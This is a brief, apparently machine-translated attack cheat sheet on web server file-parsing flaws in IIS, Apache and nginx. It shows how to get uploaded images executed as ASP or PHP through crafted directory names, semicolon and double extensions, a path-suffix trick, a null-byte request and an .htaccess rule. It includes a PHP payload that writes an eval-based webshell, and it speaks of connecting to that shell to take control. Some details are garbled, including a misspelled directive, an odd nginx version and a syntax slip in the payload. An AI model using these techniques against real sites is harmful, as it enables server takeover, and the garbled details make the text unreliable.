Some special files are parsed into a script file format by iis \ apache \ nginx in some cases.
IIS 5.x / 6.0 parsing vulnerability:
1. Directory analysis
/xx.asp/xx.jpg
Create a folder named .asp, .asa under the website, and any files with extensions in its directory will be parsed and executed by IIS as asp files.
For example, create a directory, xx.asp, then xx.asp / 1.jpg will be executed as an asp file.
If you can control the file upload path, you can take the shell regardless of whether the image is changed or not after the upload.
At this time, use a kitchen knife to connect to /xx.asp/xx.jpg to succeed, if it is /.jpg, it will not succeed, because it is a picture format not an asp format.
2. File analysis
xx.asp;.jpg
Under IIS6.0, the ones after the semicolon are not parsed. The default executables are: xx.asa, xx.cer, xx.cdx
Apache parsing vulnerability
Apache starts to judge the analysis from right to left. If it is unrecognizable, it will judge to the left.
xx.php.owf.rar or xx.php.xxxxx will do, at this time it can only be parsed to xx.php
IIS7.0 / 7.5 NGINX <8.03 malformation parsing vulnerability
In the default Fast-CGI open state, upload a xxx.jpg file, the content:
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>';)?>
Then visit xxx.jpg / .php, then a sentence Trojan file shell.php will be generated in this directory.
Via www.xxx.com/xxx.jpg/*.php to trigger the vulnerability.
nginx <8.03 Null byte code execution vulnerability
Embed the PHP code in the picture, visit: xxx.jpg% 00.php
htaccess file parsing
If the .htaccess file can be executed and uploaded, you can write:
<FilesMatch "shell.jpg"> SetHander application/x-httpd-php</FilesMatch>
Just upload the Trojan, and shell.jpg can be parsed into a php file.
